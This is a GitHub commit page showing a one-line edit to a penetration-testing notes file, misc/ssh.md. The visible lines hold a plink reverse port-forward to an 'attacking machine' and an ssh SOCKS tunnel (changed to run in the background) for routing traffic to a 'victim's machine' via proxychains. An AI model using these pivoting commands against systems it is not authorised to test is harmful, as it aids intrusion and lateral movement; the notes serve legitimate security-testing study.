Skip to content

Commit

Permalink
minor
Browse files Browse the repository at this point in the history
  • Loading branch information
maldevel committed Jun 6, 2017
1 parent a6bcb28 commit 477ce45
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion misc/ssh.md
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@ plink -l root -pw <mypassword> <attacking.machine.ip.address> -R 3390:127.0.0.1:
* Forward/Tunnel and redirect our traffic to the victim's machine.

```bash
ssh -D 9050 [email protected]
ssh -f -N -D 9050 [email protected]
```

* proxychains
Expand Down

0 comments on commit 477ce45

Please sign in to comment.